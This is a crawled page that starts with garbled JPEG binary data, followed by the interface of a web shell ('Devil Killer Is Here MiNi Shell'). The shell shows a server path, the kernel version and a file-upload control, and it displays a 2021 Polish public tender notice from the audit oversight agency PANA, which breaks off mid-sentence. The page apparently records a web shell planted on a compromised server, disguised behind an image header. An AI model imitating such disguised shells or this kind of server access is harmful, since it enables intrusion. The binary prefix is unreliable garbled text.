JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211020/0023972801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi utrzymania i rozwoju systemu STREFA PANA </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POLSKA AGENCJA NADZORU AUDYTOWEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 384416473</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kolejowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-217</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 428 24 95</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zakupy@pana.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pana.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> państwowa osoba prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> nadzór nad biegłymi rewidentami i firmami audytorskimi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi utrzymania i rozwoju systemu STREFA PANA </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f45c64a3-3190-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00239728</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011501/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Rozwój i utrzymanie Systemu Rejestracji i Ewidencji Firm Audytorskich STREFA</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pana <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający będzie się<br/>komunikował za pośrednictwem środka komunikacji elektronicznej tj. platformy do elektronicznej<br/>obsługi zamówień publicznych: platformazakupowa.pl (zwana Platformą) pod adresem https://platformazakupowa.pl/pn/pana.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8) oferta musi być złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem Platformy, w jednym z formatów danych: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf , podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym;<br/>9) podpisy kwalifikowane wykorzystywane przez Wykonawców do podpisywania wszelkich plików muszą spełniać wymogi określone w Rozporządzeniu Parlamentu Europejskiego i Rady (UE) nr 910/2014 z dnia 23 lipca 2014 roku w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym oraz uchylające dyrektywę 1999/93/WE (Dz.U.UE.L.2014.257.73);<br/>10) w przypadku wykorzystania formatu podpisu XAdES zewnętrzny Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu w formacie XAdES;<br/>11) maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB;<br/>12) Formaty plików wykorzystywanych przez Wykonawcę powinny być zgodne z Obwieszczeniem Prezesa Rady Ministrów 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2017 r. poz. 2247 ze zm.)<br/>13) Zamawiający dopuszcza wykorzystanie następujących formatów przesyłanych danych: <br/>.pdf .doc<br/>.xls .jpg (.jpeg) <br/>ze szczególnym wskazaniem na .pdf<br/>14) w celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a) .zip;<br/>b) .7Z</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 i 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>a)	administratorem Pani/Pana danych osobowych jest Polska Agencja Nadzoru Audytowego z siedzibą w Warszawie, ul. Kolejowa 1;<br/>b)	W sprawach dotyczących przetwarzania Pani/Pana danych osobowych może Pani/Pan kontaktować się z Inspektorem Ochrony Danych pocztą elektroniczną - adres e-mail: iod@pana.gov.pl; <br/>c)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego <br/>nr 212/2021 prowadzonym w trybie podstawowym bez negocjacji oraz zawarcia umowy;<br/>d)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>e)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. art. 78 ust. 1 i 4 ustawy Pzp , przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekroczy 4 lata, okres przechowywania obejmuje cały czas trwania umowy, a następnie przez okres wynikający z ustawy z dnia 14 lipca 1983r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164 ze zm.);<br/>f)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>g)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>h)	posiada Pani/Pan:<br/>–	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących ;<br/>–	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>–	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>–	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>i)	nie przysługuje Pani/Panu:<br/>–	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>–	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>–	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>2.	Zamawiający przypomina o ciążącym na Panu/Pani obowiązku informacyjnym wynikającym z art. 12 RODO względem osób fizycznych, których dane udostępnione zostaną Zamawiającemu w związku z prowadzonym postępowaniem.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">212.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 466000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest:<br/>1)	świadczenie przez Wykonawcę na rzecz Zamawiającego usługi utrzymania systemu, dla Systemu STREFA PANA, dalej zwanym „Systemem” wraz z:<br/>-	zapoznaniem się z Systemem przed przystąpieniem do realizacji usługi Utrzymania Systemu, na podstawie dokumentacji i kodów źródłowych, którymi dysponuje Zamawiający;<br/>-	migracją systemu na usługę publicznej chmury obliczeniowej, przeznaczoną dla Systemu , zapewnioną i administrowaną przez Wykonawcę. <br/>2)	Rozwój Systemu w maksymalnym wymiarze 2000 roboczogodzin, w oparciu o usługę publicznej chmury obliczeniowej dostarczoną przez Wykonawcę wraz z:<br/>-	dostarczeniem Zamawiającemu kodów źródłowych (nieskompilowanych) i kodów wynikowych oprogramowania Systemu;<br/>-	wykonaniem i dostarczeniem Zamawiającemu dokumentacji wytworzonych funkcjonalności.<br/>2.	Zamawiający informuje, że w zakresie Rozwoju Systemu: <br/>1)	korzysta z zamówienia podstawowego na godziny rozwojowe, gwarantowana (minimalna) liczba godzin, jaką Zamawiający wykorzysta na rozwój systemu wynosi 1100 (słownie: tysiąc sto) roboczogodzin,<br/>2)	może skorzystać z zamówienia dodatkowego (jako prawa opcji) na godziny rozwojowe, liczba godzin dodatkowych, jaką Zamawiający może wykorzystać na rozwój Systemu (ponad wymiar godzin wskazany w ust. 2 pkt 1 powyżej wynosi maksymalnie 900 (słownie: dziewięćset) roboczogodzin. Zamawiający w terminie do 23 miesięcy od dnia zawarcia Umowy zastrzega sobie prawo wielokrotnego uruchomienia dodatkowych godzin rozwojowych, z zastrzeżeniem, iż ich łączna liczba nie przekroczy 900.<br/>3.	Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 1 do SWZ – Opis przedmiotu zamówienia (Zasady i zakres świadczenia usługi Utrzymania i Rozwoju Systemu). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72514200-3 - Usługi rozbudowy systemów komputerowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> I. Max. wartość opcji 148 500,00 zł <br/>II. Rodzaj opcji: dodatkowe godziny rozwojowe w max. ilości 900 roboczogodzin.<br/>III. Ilość, termin i zakres Usługi Rozwoju Systemu w ramach Prawa opcji wynikać będzie w szczególności z:<br/>1.	potrzeby Zamawiającego spełniania przez System dodatkowych wymagań w tym dodawania nowych funkcjonalności lub rozwijania dotychczasowych funkcjonalności Systemu;<br/>2.	zmian wynikających ze współpracy Systemu z innymi systemami;<br/>3..	potrzeby dostosowania Systemu do aktualnego stanu prawnego;<br/>4.	zakresu zmian w Systemie realizowanych siłami własnymi Zamawiającego autoryzowanych przez Wykonawcę. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">D – Kwalifikacje zawodowe zespołu Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">A – Czas usunięcia awarii i błędów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie.<br/>4)	zdolności technicznej lub zawodowej Wykonawca spełni warunek jeżeli wykaże, że: <br/>a)	w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności przez Wykonawcę jest krótszy - w tym okresie należycie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje*, co najmniej dwie usługi (rozumiane jako dwie odrębne umowy) polegające na budowie wraz z wdrożeniem i utrzymaniem przez co najmniej 12 miesięcy systemu informatycznego wspierającego co najmniej składanie i obsługę formularzy przez przynajmniej 300 różnych składających/użytkowników, obsługiwanych przy pomocy przeglądarki internetowej, wykonanego w architekturze trójwarstwowej z wykorzystaniem technologii JAVA i zapewniających możliwość zastosowania zaawansowanego podpisu elektronicznego w rozumieniu <br/>art. 26 Rozporządzenia z dnia 23 lipca 2014 r. w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym oraz uchylające dyrektywę 1999/93/WE (Dz.U.UE.L.2014.257.73) oraz utrzymywanych w środowisku chmury publicznej, w tym co najmniej jeden z tych systemów informatycznych oparty na technologii mikroserwisów (składający się przynajmniej z 4 różnych mikroserwisów) wykonanych w technologii Java, o wartości nie mniejszej niż 250.000,00 zł brutto każdy z nich.<br/><br/>*Jeżeli zamówienia, o którym mowa w Rozdziale IX ust. 1 pkt 4 lit. a SWZ są wykonywane nadal, wartość wykonanej/zrealizowanej części zamówienia do upływu terminu składania ofert nie może być niższa niż wartość minimalna 250.000 zł brutto.<br/><br/>b)	dysponuje osobami zdolnymi do wykonania zamówienia o kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania Zamówienia, odpowiadającym warunkom określonym poniżej:<br/><br/>I. Kierownik Kontraktu :	<br/>1.	Wykształcenie wyższe techniczne lub/i informatyczne;<br/>2.	Certyfikaty w zakresie:<br/>- zarządzania projektami PRINCE2 i AgilePM na poziomie co najmniej podstawowym lub równoważnymi (międzynarodowe, obejmujące etapy przygotowania, inicjowania, dostarczania, sterowania i zamykania projektu),<br/>Doświadczenie:	<br/>W ciągu ostatnich 5 lat przed upływem terminu składania ofert przez okres co najmniej 2 miesięcy koordynował lub nadzorował pracę zespołu co najmniej 3-osobowego w realizacji co najmniej 2 projektów dotyczących budowy lub rozbudowy lub utrzymania systemu teleinformatycznego, o wartości projektu co najmniej 250 000,00 złotych brutto każdy.	<br/>Minimalna liczba udostępnionych osób jako kierownik kontraktu- 1<br/><br/>II. Starszy Programista	<br/>1.	Wykształcenie wyższe techniczne lub/i informatyczne;<br/>2.	Certyfikat w zakresie:<br/>- programowania JAVA SE 8 Programmer lub równoważny (międzynarodowy, poświadczający wiedzę na temat języka JAVA);<br/>3.	Bardzo dobra znajomość technologii:<br/>- JavaScript,<br/>- TypeScript,<br/>- HTML5,<br/>- CSS3,<br/>- Angular,<br/>- Spring,<br/>- Hibernate,<br/>- technologii mikroserwisów. <br/>Doświadczenie: <br/>W ciągu ostatnich 5 lat przed upływem terminu składania ofert przez co najmniej 2 miesiące pełnił rolę lidera programistów / starszego programisty w realizacji co najmniej 2 projektów dotyczących budowy lub rozbudowy lub utrzymania systemu teleinformatycznego, o wartości projektu co najmniej 250 000,00 złotych brutto każdy.	<br/>Minimalna liczba udostępnionych osób jako starszy programista - 1<br/><br/>III. Programista	<br/>1.	Kompetencje w zakresie programowania umożliwiające zdobycie certyfikatu JAVA SE 8 Programmer;<br/>2.	Dobra znajomość technologii:<br/>- JavaScript,<br/>- TypeScript,<br/>- HTML5,<br/>- CSS3,<br/>- Angular,<br/>- Spring,<br/>- Hibernate,<br/>- technologii mikroserwisów.	<br/>Doświadczenie:<br/>W ciągu ostatnich 5 lat przed upływem terminu składania ofert przez co najmniej 2 miesiące pełnił rolę programisty w realizacji co najmniej 2 projektów dotyczących budowy lub rozbudowy lub utrzymania systemu teleinformatycznego, o wartości projektu co najmniej 250 000,00 złotych brutto każdy.	<br/>Minimalna liczba udostępnionych osób jako programista - 1<br/><br/>IV. Architekt biznesowy:	<br/>1.	Wykształcenie wyższe II stopnia;<br/>Doświadczenie: <br/>W ciągu ostatnich 5 lat przed upływem terminu składania ofert przez co najmniej 2 miesiące pełnił rolę architekta systemów informatycznych w realizacji co najmniej 2 projektów dotyczących budowy lub rozbudowy systemu teleinformatycznego, o wartości projektu co najmniej 250 000,00 złotych brutto każdy. <br/>Minimalna liczba udostępnionych osób jako architekt biznesowy - 1<br/><br/>V. Starszy Analityk biznesowy:	<br/>1.	Wykształcenie wyższe II stopnia;<br/>2.	certyfikat w zakresie: - ITIL na poziomie co najmniej podstawowym lub równoważnym (międzynarodowy, obejmujący procesy zarządzania incydentami, problemami, zmianą, konfiguracją i poziomem świadczenia usług);<br/>3.	Bardzo dobra znajomość:<br/>- modelowania procesów biznesowych z wykorzystaniem notacji BPMN.	<br/>Doświadczenie: <br/>W ciągu ostatnich 5 lat przed upływem terminu składania ofert przez co najmniej 2 miesiące pełnił rolę analityka w realizacji co najmniej 2 projektów dotyczących budowy lub rozbudowy systemu teleinformatycznego, o wartości projektu co najmniej 250 000,00 złotych brutto każdy.	<br/>Minimalna liczba udostępnionych osób jako starszy analityk biznesowy - 1<br/><br/>VI. Analityk biznesowy:	<br/>1.	Wykształcenie wyższe II stopnia;<br/>2.	Dobra znajomość:<br/>- modelowania procesów biznesowych z wykorzystaniem notacji BPMN.	<br/>Doświadczenie:<br/>W ciągu ostatnich 5 lat przed upływem 